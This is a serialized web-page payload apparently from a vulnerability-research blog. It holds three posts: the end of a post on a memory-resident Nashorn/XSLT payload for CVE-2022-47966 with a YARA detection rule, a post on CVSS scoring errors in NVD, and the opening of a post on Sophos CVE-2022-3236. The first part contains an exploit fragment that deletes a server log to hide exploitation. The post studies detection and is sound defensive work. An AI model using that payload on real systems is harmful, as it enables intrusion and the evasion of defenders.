\u003C\u002Fxsl:stylesheet>\n\u003C\u002Fds:Transform>\n",[886,110933,110934,110956,110976,110992,111008,111026,111048,111080,111112,111158,111180,111189,111211,111223,111235],{"__ignoreMap":219},[1373,110935,110936,110938,110940,110942,110944,110946,110948,110950,110952,110954],{"class":1375,"line":1376},[1373,110937,11852],{"class":1383},[1373,110939,109306],{"class":6300},[1373,110941,4606],{"class":109775},[1373,110943,109324],{"class":6300},[1373,110945,109327],{"class":8252},[1373,110947,5417],{"class":1383},[1373,110949,183],{"class":1387},[1373,110951,109357],{"class":1391},[1373,110953,183],{"class":1387},[1373,110955,6765],{"class":1383},[1373,110957,110958,110960,110962,110964,110966,110968,110970,110972,110974],{"class":1375,"line":220},[1373,110959,8246],{"class":1383},[1373,110961,109368],{"class":6300},[1373,110963,4606],{"class":109775},[1373,110965,49025],{"class":6300},[1373,110967,45880],{"class":8252},[1373,110969,5417],{"class":1383},[1373,110971,183],{"class":1387},[1373,110973,84878],{"class":1391},[1373,110975,19057],{"class":1387},[1373,110977,110978,110980,110982,110984,110986,110988,110990],{"class":1375,"line":1266},[1373,110979,110156],{"class":8252},[1373,110981,4606],{"class":51986},[1373,110983,109852],{"class":8252},[1373,110985,5417],{"class":1383},[1373,110987,183],{"class":1387},[1373,110989,109859],{"class":1391},[1373,110991,19057],{"class":1387},[1373,110993,110994,110996,110998,111000,111002,111004,111006],{"class":1375,"line":1852},[1373,110995,110156],{"class":8252},[1373,110997,4606],{"class":51986},[1373,110999,109870],{"class":8252},[1373,111001,5417],{"class":1383},[1373,111003,183],{"class":1387},[1373,111005,109877],{"class":1391},[1373,111007,19057],{"class":1387},[1373,111009,111010,111012,111014,111016,111018,111020,111022,111024],{"class":1375,"line":4692},[1373,111011,110156],{"class":8252},[1373,111013,4606],{"class":51986},[1373,111015,109368],{"class":8252},[1373,111017,5417],{"class":1383},[1373,111019,183],{"
class":1387},[1373,111021,109433],{"class":1391},[1373,111023,183],{"class":1387},[1373,111025,6765],{"class":1383},[1373,111027,111028,111030,111032,111034,111036,111038,111040,111042,111044,111046],{"class":1375,"line":4724},[1373,111029,85290],{"class":1383},[1373,111031,109368],{"class":6300},[1373,111033,4606],{"class":109775},[1373,111035,30296],{"class":6300},[1373,111037,109910],{"class":8252},[1373,111039,5417],{"class":1383},[1373,111041,183],{"class":1387},[1373,111043,2180],{"class":1391},[1373,111045,183],{"class":1387},[1373,111047,6765],{"class":1383},[1373,111049,111050,111052,111054,111056,111058,111060,111062,111064,111066,111068,111070,111072,111074,111076,111078],{"class":1375,"line":4756},[1373,111051,109442],{"class":1383},[1373,111053,109368],{"class":6300},[1373,111055,4606],{"class":109775},[1373,111057,109931],{"class":6300},[1373,111059,46496],{"class":8252},[1373,111061,5417],{"class":1383},[1373,111063,183],{"class":1387},[1373,111065,109940],{"class":1391},[1373,111067,183],{"class":1387},[1373,111069,109483],{"class":8252},[1373,111071,5417],{"class":1383},[1373,111073,183],{"class":1387},[1373,111075,109951],{"class":1391},[1373,111077,183],{"class":1387},[1373,111079,85355],{"class":1383},[1373,111081,111082,111084,111086,111088,111090,111092,111094,111096,111098,111100,111102,111104,111106,111108,111110],{"class":1375,"line":4768},[1373,111083,109442],{"class":1383},[1373,111085,109368],{"class":6300},[1373,111087,4606],{"class":109775},[1373,111089,109931],{"class":6300},[1373,111091,46496],{"class":8252},[1373,111093,5417],{"class":1383},[1373,111095,183],{"class":1387},[1373,111097,109974],{"class":1391},[1373,111099,183],{"class":1387},[1373,111101,109483],{"class":8252},[1373,111103,5417],{"class":1383},[1373,111105,183],{"class":1387},[1373,111107,109985],{"class":1391},[1373,111109,183],{"class":1387},[1373,111111,85355],{"class":1383},[1373,111113,111114,111116,111118,111120,111122,111124,111126,111128,111130,111132,111134,1
11136,111138,111141,111143,111145,111147,111150,111152,111154,111156],{"class":1375,"line":4792},[1373,111115,109442],{"class":1383},[1373,111117,109368],{"class":6300},[1373,111119,4606],{"class":109775},[1373,111121,109931],{"class":6300},[1373,111123,46496],{"class":8252},[1373,111125,5417],{"class":1383},[1373,111127,183],{"class":1387},[1373,111129,110008],{"class":1391},[1373,111131,183],{"class":1387},[1373,111133,109483],{"class":8252},[1373,111135,5417],{"class":1383},[1373,111137,183],{"class":1387},[1373,111139,111140],{"class":1391},"se:eval($jsobject,'var File = Java.type(",[1373,111142,7218],{"class":7054},[1373,111144,85318],{"class":2209},[1373,111146,39663],{"class":7054},[1373,111148,111149],{"class":1391},"java.io.File",[1373,111151,7218],{"class":7054},[1373,111153,85318],{"class":2209},[1373,111155,39663],{"class":7054},[1373,111157,4680],{"class":1391},[1373,111159,111160,111163,111165,111167,111169,111172,111174,111176,111178],{"class":1375,"line":4798},[1373,111161,111162],{"class":1391},"     var log = new File(",[1373,111164,7218],{"class":7054},[1373,111166,85318],{"class":2209},[1373,111168,39663],{"class":7054},[1373,111170,111171],{"class":1391},"..\u002Flogs\u002Fserverout1.txt",[1373,111173,7218],{"class":7054},[1373,111175,85318],{"class":2209},[1373,111177,39663],{"class":7054},[1373,111179,4680],{"class":1391},[1373,111181,111182,111185,111187],{"class":1375,"line":4806},[1373,111183,111184],{"class":1391},"     
log.delete();')",[1373,111186,183],{"class":1387},[1373,111188,85355],{"class":1383},[1373,111190,111191,111193,111195,111197,111199,111201,111203,111205,111207,111209],{"class":1375,"line":4817},[1373,111192,109442],{"class":1383},[1373,111194,109368],{"class":6300},[1373,111196,4606],{"class":109775},[1373,111198,110034],{"class":6300},[1373,111200,109483],{"class":8252},[1373,111202,5417],{"class":1383},[1373,111204,183],{"class":1387},[1373,111206,110043],{"class":1391},[1373,111208,183],{"class":1387},[1373,111210,85355],{"class":1383},[1373,111212,111213,111215,111217,111219,111221],{"class":1375,"line":4825},[1373,111214,109601],{"class":1383},[1373,111216,109368],{"class":6300},[1373,111218,4606],{"class":109775},[1373,111220,30296],{"class":6300},[1373,111222,6765],{"class":1383},[1373,111224,111225,111227,111229,111231,111233],{"class":1375,"line":4835},[1373,111226,56557],{"class":1383},[1373,111228,109368],{"class":6300},[1373,111230,4606],{"class":109775},[1373,111232,49025],{"class":6300},[1373,111234,6765],{"class":1383},[1373,111236,111237,111239,111241,111243,111245],{"class":1375,"line":4843},[1373,111238,46627],{"class":1383},[1373,111240,109306],{"class":6300},[1373,111242,4606],{"class":109775},[1373,111244,109324],{"class":6300},[1373,111246,6765],{"class":1383},[18,111248,111249,111250,111252,111253,111258],{},"These are short snippets, but they demonstrate the primitives needed to deploy a more malicious tool. As demonstrated, an XSLT transform that invokes Nashorn has few limits on what it can do on the victim host, while remaining in memory. 
",[886,111251,109639],{}," is an inferior solution, especially since open source tooling and ",[47,111254,111257],{"href":111255,"rel":111256},"https:\u002F\u002Fwww.rapid7.com\u002Fblog\u002Fpost\u002F2023\u002F01\u002F19\u002Fetr-cve-2022-47966-rapid7-observed-exploitation-of-critical-manageengine-vulnerability\u002F",[51],"reporting"," has told defenders that’s what they should be watching out for.",[18,111260,111261],{},"The only wrinkle is that Velociraptor’s detection will still flag exploitation even when the attacker uses the Nashorn transform. That’s because Velociraptor implemented a simple YARA rule that parses the ManageEngine log file for indicators of compromise:",[1354,111263,111266],{"className":111264,"code":111265,"language":1359,"meta":219},[1357],"rule LOG_EXPL_ManageEngine_CVE_2022_47966_Jan23 {\n   meta:\n    description = \"Detects Exploitation of Critical ManageEngine Vulnerability: CVE-2022-47966\"\n    author = \"Matt Green - @mgreen27\"\n    reference = \"https:\u002F\u002Fwww.rapid7.com\u002Fblog\u002Fpost\u002F2023\u002F01\u002F19\u002Fetr-cve-2022-47966-rapid7-observed-exploitation-of-critical-manageengine-vulnerability\u002F\"\n    date = \"2023-01-20\"\n   strings:\n    $s1 = \"com.adventnet.authentication.saml.SamlException: Signature validation failed. SAML Response rejected\"\n    $re1 = \u002Finvalid_response --> .{20,}\u002Fs  \u002F\u002FLogging typically contains this string followed by Base64 \u003Csamlp:Response Version=\n     \n    $ip1 = \"111.68.7.122\"\n    $ip2 = \"149.28.193.216\"\n    $ip3 = \"172.93.193.64\"\n     \n    condition:\n    any of them\n}\n",[886,111267,111265],{"__ignoreMap":219},[18,111269,111270,111271,1554,111274,111277],{},"To me, this is brilliant and perhaps an ideal solution. As far as I can tell, the attacker can’t prevent ",[886,111272,111273],{},"$s1",[886,111275,111276],{},"$re1"," from being written to the log. 
The defender wins as long as Velociraptor can acquire the log file before the attacker modifies or deletes it. Of course, that race is sort of a dicey bet for the defender. But it’s better than nothing and goes to show that there is huge value in collecting and parsing log files.",[1920,111279,1903],{"id":1902},[18,111281,111282,111283,111285],{},"The lack of diversity in public exploits can lead to scenarios in which both attackers and defenders are only using or defending against suboptimal exploits. In the case of CVE-2022-47966, we see both attackers and defenders anticipating exploits that use an XSLT transform that ends in ",[886,111284,109639],{}," in order to execute external programs. The reality is that an attacker with only a little knowledge can develop an exploit that follows a completely different path and bypasses most open source detections currently available.",[18,111287,111288,111289,109200],{},"VulnCheck tracks public exploits and their timelines. VulnCheck also develops their own exploits including a version of CVE-2022-47966 that creates a reverse shell with Nashorn. 
For more information, ",[47,111290,109199],{"href":109197,"rel":111291},[51],[2901,111293,111294],{},"",{"title":219,"searchDepth":220,"depth":220,"links":111296},[111297,111298,111299],{"id":109290,"depth":220,"text":109291},{"id":109653,"depth":220,"text":109654},{"id":109757,"depth":220,"text":109758},"2023-02-14","Exploring a memory resident payload for CVE-2022-47966.",{"slug":111303},"cve-2022-47966-payload","\u002Fblog\u002Fcve-2022-47966-payload",{"title":83481,"description":111301},"blog\u002Fcve-2022-47966-payload",[242],"DlE1sj87MnkYF17q67oQZZMgtAqr9ToiyT5C7WROiP0",{"id":111310,"title":111311,"articles":111312,"authors":111325,"body":111327,"date":111316,"description":111556,"extension":234,"image":7,"link":7,"meta":111557,"navigation":237,"path":111559,"seo":111560,"series":7,"stem":111561,"subtype":7,"tags":111562,"__hash__":111563},"blog\u002Fblog\u002Fcvss-accuracy-issues.md","Who to Trust? National Vulnerability Database CVSS Accuracy Issues - VulnCheck",[111313,111317,111321],{"title":111314,"source":11218,"link":111315,"date":111316},"Discrepancies Discovered in Vulnerability Severity Ratings","https:\u002F\u002Fwww.darkreading.com\u002Fapplication-security\u002Fdiscrepancies-discovered-in-vulnerability-severity-ratings","2023-02-02",{"title":111318,"source":3494,"link":111319,"date":111320},"Risky Biz News: Zero-day alert for GoAnywhere file transfer servers","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-zero-day-alert-for","2023-02-03",{"title":111322,"source":111323,"link":111324,"date":111320},"Week In Review: Auto, Security, Pervasive Computing","Semiconductor 
Engineering","https:\u002F\u002Fsemiengineering.com\u002Fweek-in-review-auto-security-pervasive-computing-153\u002F",[111326],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":111328,"toc":111554},[111329,111331,111339,111345,111354,111378,111385,111389,111393,111401,111406,111419,111433,111445,111449,111457,111462,111465,111468,111476,111479,111484,111488,111491,111494,111497,111504,111513,111519,111522,111525,111531,111534,111539,111543,111545,111548],[1920,111330,68327],{"id":68326},[18,111332,2245,111333,111338],{},[47,111334,111337],{"href":111335,"rel":111336},"https:\u002F\u002Fwww.first.org\u002Fcvss\u002Fspecification-document",[51],"Common Vulnerability Scoring System"," (CVSS) is a vulnerability scoring framework that allows security practitioners to determine a vulnerability’s severity on a simple scale: low, medium, high, and critical. The score’s associated CVSS vector often provides much needed context to low-quality CVE descriptions.",[18,111340,111341],{},[68,111342],{":width":10862,"alt":111343,"src":111344},"CVE-2022-34698","\u002Fblog\u002Fcvss-accuracy-issues\u002Fcve-2022-34689.png",[18,111346,111347,111348,111353],{},"Though the CVSS system has shortcomings, it is widely used throughout the security industry. 
This is due, in no small part, to the inclusion of a CVSS base score and vector in every entry of the ",[47,111349,111352],{"href":111350,"rel":111351},"https:\u002F\u002Fnvd.nist.gov\u002F",[51],"National Vulnerability Database"," (NVD) maintained by NIST.",[18,111355,111356,111357,111361,111362,111367,111368,1255,111373,111377],{},"Due to their ready availability, CVSS scores and vectors are often used to drive vulnerability prioritization, and are incorporated into more advanced scoring schemes like ",[47,111358,11371],{"href":111359,"rel":111360},"https:\u002F\u002Fwww.first.org\u002Fepss\u002Fmodel#:~:text=Data%20Architecture%20and%20Sources",[51],", Qualys ",[47,111363,111366],{"href":111364,"rel":111365},"https:\u002F\u002Fqualysguard.qg2.apps.qualys.com\u002Fportal-help\u002Fen\u002Fvm\u002Fthreat\u002Fcalculating_asset_risk_score.htm",[51],"TruRisk",", Tenable ",[47,111369,111372],{"href":111370,"rel":111371},"https:\u002F\u002Fwww.tenable.com\u002Fblog\u002Fwhat-is-vpr-and-how-is-it-different-from-cvss",[51],"VPR",[47,111374,111376],{"href":54540,"rel":111375},[51],"SSVC"," (as the impact component).",[18,111379,111380,111381,111384],{},"So, while CVSS isn’t necessarily well loved (or even well understood), it’s a key driver of vulnerability management, as currently practiced by the security industry. However, scores in NVD aren’t always accurate. Incorrect scores affect countless vulnerability management and remediation plans all over the world, potentially resulting in many wasted hours diverting resources away from the vulnerabilities that ",[295,111382,111383],{},"should"," be prioritized.",[263,111386],{":list":111387,"ico":266,"title":111388},"[\"CVSS scores are a driving force behind vulnerability management and remediation. However, the scores in NVD aren’t always accurate.\",\"At the time of analysis, NVD contained 120,000 CVE with CVSSv3 scores. 
Of those, almost 25,000 (20%) had primary and secondary scores from NIST and a vendor, and approximately 14,000 (56%) of those had conflicting scores.\",\"VulnCheck analyzed CVE that had been assigned the CWE for XSS or CSRF to ensure their \\\"user interaction\\\" field had been properly set, and found the error rate for the primary source was 1.10% and the error rate for the secondary source was 15.03%.\",\"There are over 39 unique organizations contributing erroneous scores in the NVD.\",\"There is reason to believe errors in NIST’s CVSS scoring could have a negative impact on organizations that rely on NVD, directly or indirectly, for accurate information.\"]","Who to Trust? National Vulnerability Database CVSS Accuracy Issues",[1920,111390,111392],{"id":111391},"cvss-scoring-errors-in-nvd","CVSS Scoring Errors in NVD",[18,111394,111395,111396,59],{},"As a quick example, consider ",[47,111397,111400],{"href":111398,"rel":111399},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002Fcve-2022-36446",[51],"CVE-2022-36446",[18,111402,111403],{},[68,111404],{":width":10862,"alt":111400,"src":111405},"\u002Fblog\u002Fcvss-accuracy-issues\u002Fcve-2022-36446.png",[18,111407,111408,111409,111414,111415,111418],{},"CVE-2022-36446 is a command injection vulnerability affecting ",[47,111410,111413],{"href":111411,"rel":111412},"https:\u002F\u002Fwww.webmin.com\u002F",[51],"Webmin",". Webmin is no stranger to mass exploitation. 
It has an entry in the ",[47,111416,30055],{"href":2864,"rel":111417},[51]," (KEV) Catalog, and has been known to be exploited by botnets like Echobot and Sysrv.",[18,111420,111421,111422,111426,111427,111432],{},"CVE-2022-36446 has an associated ",[47,111423,32281],{"href":111424,"rel":111425},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-framework\u002Fblob\u002F06f0fffc20f83f7eb31dc34cf63573c8ef36f19f\u002Fmodules\u002Fexploits\u002Flinux\u002Fhttp\u002Fwebmin_package_updates_rce.rb",[51]," and a nice ",[47,111428,111431],{"href":111429,"rel":111430},"https:\u002F\u002Fmedium.com\u002F@emirpolat\u002Fcve-2022-36446-webmin-1-997-7a9225af3165",[51],"technical writeup"," by the vulnerability discoverer. At face value, this critical (according to NIST) vulnerability appears to be an obvious one to prioritize for remediation.",[18,111434,111435,111436,111438,111439,111444],{},"However, NIST has assigned this CVE an incorrect CVSSv3 score. CVE-2022-36446 is ",[295,111437,6881],{}," a critical vulnerability as it requires authentication. Correcting NIST’s CVSS vector drops the score from 9.8 (critical) to ",[47,111440,111443],{"href":111441,"rel":111442},"https:\u002F\u002Fwww.first.org\u002Fcvss\u002Fcalculator\u002F3.1#CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H",[51],"7.2"," (high). This drop in score makes CVE-2022-36446 significantly less of a priority.",[1920,111446,111448],{"id":111447},"thousands-of-primary-and-secondary-score-sources-disagree","Thousands of Primary and Secondary Score Sources Disagree",[18,111450,111451,111452,4606],{},"Of course, that’s just one example from the 200,000 vulnerabilities in NVD. One-off mistakes are bound to happen at that scale, and that’s understandable. More interesting to us is the potential for a large number of errors. 
The following is the NVD entry for ",[47,111453,111456],{"href":111454,"rel":111455},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-21557",[51],"CVE-2023-21557",[18,111458,111459],{},[68,111460],{":width":10862,"alt":111456,"src":111461},"\u002Fblog\u002Fcvss-accuracy-issues\u002Fcve-2023-21557.png",[18,111463,111464],{},"Above you can see two different CVSS scores for the same vulnerability. The primary score, calculated by NIST, is 9.1 (critical), and the secondary score, calculated by Microsoft, is 7.5 (high). No information is provided on why the scores differ, but NIST has chosen to assign itself as the primary and default score. Does NIST know better than Microsoft on this matter? Maybe. It seems unlikely, but without additional information it’s difficult to say.",[18,111466,111467],{},"This is not a unique situation. At the time of analysis, NVD contained 120,000 CVE with CVSSv3 scores.",[22,111469,111470,111473],{},[25,111471,111472],{},"Of those, almost 25,000 (20%) had primary and secondary scores like the ones pictured above.",[25,111474,111475],{},"56% of that group had conflicting primary and secondary scores.",[18,111477,111478],{},"That very high conflict rate easily leads practitioners to question whether to trust the primary or secondary source. Primary, based on the name, certainly sounds more authoritative. But it turns out, NIST almost always assigns itself as the primary source. 
Of the 14 total primary sources found in the 120,000 CVE with CVSSv3 scores, NIST was listed as the primary source 116,169 times (97%).",[1925,111480,111481],{},[18,111482,111483],{},"Primary CVSS Source for CVE with CVSSv3 Scores",[11128,111485],{":labels":111486,":values":111487},"[\"info@cert.vde.com\",\"nvd@nist.gov\",\"product-security@qualcomm.com\",\"psirt@adobe.com\",\"psirt@nvidia.com\",\"psirt@paloaltonetworks.com\",\"report@snyk.io\",\"secalert_us@oracle.com\",\"secure@microsoft.com\",\"1security-advisories@github.com\",\"security@wordfence.com\",\"sirt@juniper.net\",\"twcert@cert.org.tw\",\"vulnerabilitylab@mend.io\"]","[85,116169,25,646,22,14,54,1123,857,77,34,167,137,33]",[18,111489,111490],{},"Undoubtedly, NIST has expertise in vulnerability scoring, but claiming the overwhelming majority of primary scores, even in the presence of other conflicting secondary scores, does make us wonder which score is more likely to be accurate.",[18,111492,111493],{},"Is the NIST generated score really the correct one to use 97% of the time?",[18,111495,111496],{},"Or might the score generated by the organizations in charge of the vulnerable software be more reliable?",[18,111498,111499,111500,111503],{},"To answer this, we dug a little deeper. Some vulnerabilities have elements of their CVSSv3 vector that must be set to specific values. For example, both XSS and CSRF vulnerabilities ",[295,111501,111502],{},"always"," require user interaction. 
Therefore, the CVSSv3 vector for these vulnerabilities must always contain UI:R (user interaction required).",[18,111505,111506,111507,111512],{},"To determine if a CVE is a CSRF or XSS vulnerability, we extracted the vulnerabilities’ ",[47,111508,111511],{"href":111509,"rel":111510},"https:\u002F\u002Fcwe.mitre.org\u002F",[51],"CWE-ID"," from NVD.",[18,111514,111515],{},[68,111516],{":width":10862,"alt":111517,"src":111518},"CVE with two sources","\u002Fblog\u002Fcvss-accuracy-issues\u002Ftwo-sources.png",[18,111520,111521],{},"Of the 120,000 CVE entries with CVSSv3 scores, we found 12,969 vulnerabilities had been assigned an XSS CWE by the primary source and 2,091 vulnerabilities were assigned an XSS CWE by a secondary source. The primary source failed to use UI:R for XSS vulnerabilities 111 times, a 0.86% error rate, whereas the secondary sources failed to use UI:R 346 times, a 16.54% error rate.",[18,111523,111524],{},"CSRF was less severe. The primary source only failed to use UI:R for 59 out of 2,548 (2.3%) CSRF vulnerabilities. The secondary source used the wrong UI for 27 out of 390 (6.9%).",[18,111526,111527,111528,111530],{},"The primary source (typically NIST) has the lower error rate, but it remains higher than you’d expect for a scoring element that can be checked and verified programmatically. The secondary sources’ error rate is quite bad at nearly 17%. In this case, it appears that NVD ",[295,111529,5650],{}," the preferred source, although that doesn’t necessarily translate to other vulnerability types.",[18,111532,111533],{},"The error rates were higher than we expected, which got us thinking, “Who is making these errors?” We mapped the errors to their sources and found 39 unique organizations contributed erroneous scores. 
The top five incorrect score sources can be found in the following graph:",[1925,111535,111536],{},[18,111537,111538],{},"Top Sources of XSS and CSRF CVE Incorrectly using CVSSv3 UI:N",[11128,111540],{":labels":111541,":values":111542},"[\"nvd@nist.gov\",\"security@huntr.dev\",\"security@wordfence.com\",\"security-advisories@github.com\",\"pics-cert@hq.dhs.gov\"]","[169,134,70,50,17]",[1920,111544,1903],{"id":1902},[18,111546,111547],{},"CVSS scores are a driving force behind vulnerability management and remediation. Typically, the scores are sourced from NIST’s NVD. Therefore, the accuracy of the scores in NVD are an important factor in the database’s overall usefulness. There is reason to believe that there is a non-negligible error rate in NIST’s CVSS scoring which could have a negative impact on organizations that rely on NVD, directly or indirectly, for accurate information.",[18,111549,111550,111551,109200],{},"VulnCheck maintains a list of corrected CVSS scores. For more information, ",[47,111552,109199],{"href":111553},"\u002Fregister",{"title":219,"searchDepth":220,"depth":220,"links":111555},[],"The National Vulnerability Database contains thousands of CVSS vectors. 
How accurate are those vectors and does accuracy matter?",{"slug":111558},"cvss-accuracy-issues","\u002Fblog\u002Fcvss-accuracy-issues",{"title":111311,"description":111556},"blog\u002Fcvss-accuracy-issues",[1280],"-Y68WOTtDmdMQFxiv-vqt5anWfc6jz2vpRa-tuBaYYs",{"id":111565,"title":111566,"articles":111567,"authors":111603,"body":111605,"date":112211,"description":112212,"extension":234,"image":7,"link":7,"meta":112213,"navigation":237,"path":112215,"seo":112216,"series":7,"stem":112217,"subtype":7,"tags":112218,"__hash__":112219},"blog\u002Fblog\u002Fsophos-cve-2022-3236.md","Assessing Potential Exploitation of Sophos Firewall and CVE-2022-3236 Blog - VulnCheck",[111568,111572,111575,111579,111582,111586,111589,111593,111596,111600],{"title":111569,"source":85794,"link":111570,"date":111571},"More than 4,400 Sophos firewall servers remain vulnerable to critical exploits","https:\u002F\u002Farstechnica.com\u002Finformation-technology\u002F2023\u002F01\u002Fmore-than-4400-sophos-firewall-servers-remain-vulnerable-to-critical-exploits\u002F","2023-01-17",{"title":111573,"source":14373,"link":111574,"date":111571},"Over 4,000 Sophos Firewall devices vulnerable to RCE attacks","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fover-4-000-sophos-firewall-devices-vulnerable-to-rce-attacks\u002F",{"title":111576,"source":111577,"link":111578,"date":111571},"Over 4,000 Sophos firewall servers still vulnerable to code injection vulnerability","Computing","https:\u002F\u002Fwww.computing.co.uk\u002Fnews\u002F4062871\u002Fsophos-firewall-servers-vulnerable-code-injection-vulnerability",{"title":111580,"source":3494,"link":111581,"date":111571},"Risky Biz News: Google Search and Ads have a major malware problem","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-google-search-and?utm_source=substack&utm_medium=email",{"title":111583,"source":12153,"link":111584,"date":111585},"Thousands of Sophos Firewall devices at risk of RCE 
attacks","https:\u002F\u002Fwww.scmagazine.com\u002Fbrief\u002Fdevice-security\u002Fthousands-of-sophos-firewall-devices-at-risk-of-rce-attacks","2023-01-18",{"title":111587,"source":93312,"link":111588,"date":111585},"Thousands of Sophos servers are vulnerable to this dangerous exploit","https:\u002F\u002Fwww.techradar.com\u002Fnews\u002Fthousands-of-sophos-servers-are-vulnerable-to-this-dangerous-exploit",{"title":111590,"source":111591,"link":111592,"date":111585},"About 6% of Internet-Facing Sophos Firewalls Are Exposed to Critical Exploit, Expert Warns","TechTimes","https:\u002F\u002Fwww.techtimes.com\u002Farticles\u002F286405\u002F20230118\u002F6-internet-facing-sophos-firewalls-exposed-critical-exploit-expert-warns.htm",{"title":111594,"source":3481,"link":111595,"date":111585},"Thousands of Sophos firewalls still vulnerable out there to hijacking","https:\u002F\u002Fwww.theregister.com\u002F2023\u002F01\u002F18\u002F4000_buggy_sophos_firewalls\u002F",{"title":111597,"source":84069,"link":111598,"date":111599},"EOL Sophos firewalls get hotfix for old but still exploited vulnerability (CVE-2022-3236)","https:\u002F\u002Fwww.helpnetsecurity.com\u002F2023\u002F12\u002F13\u002Feol-sophos-firewalls-cve-2022-3236\u002F","2023-12-13",{"title":111601,"source":14390,"link":111602,"date":111599},"SOPHOS BACKPORTS FIX FOR CVE-2022-3236 FOR EOL FIREWALL FIRMWARE VERSIONS DUE TO ONGOING ATTACKS","https:\u002F\u002Fsecurityaffairs.com\u002F155746\u002Fsecurity\u002Fsophos-backports-cve-2022-3236-patch.html",[111604],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":111606,"toc":112209},[111607,111609,111629,111632,111636,111655,111661,111673,111679,111682,111686,111701,111707,111716,111721,111725,111730,111734,111739,111743,111746,111748,111754,111757,112159,112169,112175,112181,112185,112188,112193,112196,112198,112201,112206],[1920,111608,68327],{"id":68326},[18,111610,111611,111612,111617,111618,111622,111623,111628],{},"Sophos took 
immediate steps to remediate ",[47,111613,111616],{"href":111614,"rel":111615},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-3236",[51],"CVE-2022-3236"," – an unauthenticated and remote code execution vulnerability affecting the Sophos Firewall Webadmin and User Portal HTTP interfaces – with an automated hotfix sent out in September 2022. Through its ",[47,111619,5359],{"href":111620,"rel":111621},"https:\u002F\u002Fwww.sophos.com\u002Fen-us\u002Fsecurity-advisories\u002Fsophos-sa-20220923-sfos-rce",[51]," published on September 23, 2022, it also alerted users who don't receive automatic hotfixes to apply the update themselves. The advisory stated the vulnerability had previously been used against \"a small set of specific organizations, primarily in the South Asia region.\" In December, Sophos released ",[47,111624,111627],{"href":111625,"rel":111626},"https:\u002F\u002Fwww.sophos.com\u002Fen-us\u002Fsecurity-advisories\u002Fsophos-sa-20221201-sfos-19-5-0",[51],"v19.5 GA"," with an official fix.",[263,111630],{":list":111631,"ico":266,"title":83529},"[\"As there are no public proof-of-concept exploits for CVE-2022-3236, we created our own to determine its potential for mass exploitation.\",\"We scanned internet-facing Sophos Firewalls and found more than 4,000 firewalls that were too old to receive a hotfix.\",\"We encourage Sophos Firewall administrators to look through their logs to determine if they see indications of exploit attempts. 
Two files to focus on include `\u002Flogs\u002Fcsc.log` and `\u002Flog\u002FvalidationError.log`.\",\"Internet-facing firewalls appear to largely be eligible for hotfixes and the default authentication captcha likely prevented mass exploitation.\"]",[1920,111633,111635],{"id":111634},"few-public-details","Few Public Details",[18,111637,111638,111639,982,111643,111648,111649,111654],{},"CVE-2022-3236 was quickly added to the CISA ",[47,111640,111642],{"href":2864,"rel":111641},[51],"Known Exploited Vulnerabilities Catalog",[47,111644,111647],{"href":111645,"rel":111646},"https:\u002F\u002Fwww.zerodayinitiative.com\u002Fblog\u002F2022\u002F10\u002F19\u002Fcve-2022-3236-sophos-firewall-user-portal-and-web-admin-code-injection",[51],"Zero Day Initiative"," (ZDI) published a high-level description of the issue in October, but public information has otherwise been non-existent. Self-described “proof of concept” exploits have been published to GitHub, but they were quickly deleted, likely due to their scamming nature. ",[47,111650,111653],{"href":111651,"rel":111652},"https:\u002F\u002Fsploitus.com\u002F?query=CVE-2022-3236#exploits",[51],"Sploitus"," has cached a number of these repositories.",[18,111656,111657],{},[68,111658],{":width":10862,"alt":111659,"src":111660},"sploitus","\u002Fblog\u002Fsophos-cve-2022-3236\u002Fsploitus.png",[18,111662,111663,111664,111667,111668,59],{},"As the image above shows, the repository is soliciting payment via ",[886,111665,111666],{},"satoshidisk.com"," for a promised exploit and targeting information. This is a common scam that leaves many buyers ",[47,111669,111672],{"href":111670,"rel":111671},"https:\u002F\u002Fsatoshidisk.com\u002Fpay\u002FCGXTIL",[51],"unsatisfied",[18,111674,111675],{},[68,111676],{":width":10862,"alt":111677,"src":111678},"Bad Review","\u002Fblog\u002Fsophos-cve-2022-3236\u002F1star.png",[18,111680,111681],{},"At the time of writing, there appear to be no public proof-of-concept exploits. 
However, the ZDI article gives sufficient information to quickly reproduce the issue (as we have), so it’s only a matter of time before something is made public.",[1920,111683,111685],{"id":111684},"sophos-firewall-in-the-wild","Sophos Firewall in the Wild",[18,111687,111688,111689,111694,111695,111700],{},"The scam repositories aren’t surprising given the popularity of Sophos Firewall. Using Shodan, we can identify ",[47,111690,111693],{"href":111691,"rel":111692},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=title%3A%22Sophos%22+html%3A%22Without+JavaScript+support+user+portal+will+not+work.%22",[51],"~78,0000"," User Portal and ",[47,111696,111699],{"href":111697,"rel":111698},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=title%3A%22Sophos%22+html%3A%22Without+JavaScript+support+web+console+will+not+work.%22",[51],"~10,000"," WebAdmin interfaces.",[18,111702,111703],{},[68,111704],{":width":10862,"alt":111705,"src":111706},"shodan","\u002Fblog\u002Fsophos-cve-2022-3236\u002Fshodan.png",[18,111708,111709,111710,111715],{},"Since we wrote our own exploit for CVE-2022-3236 (and ",[47,111711,111714],{"href":111712,"rel":111713},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-1040",[51],"CVE-2022-1040","), we were curious how many internet-facing Sophos Firewalls might still be vulnerable. 
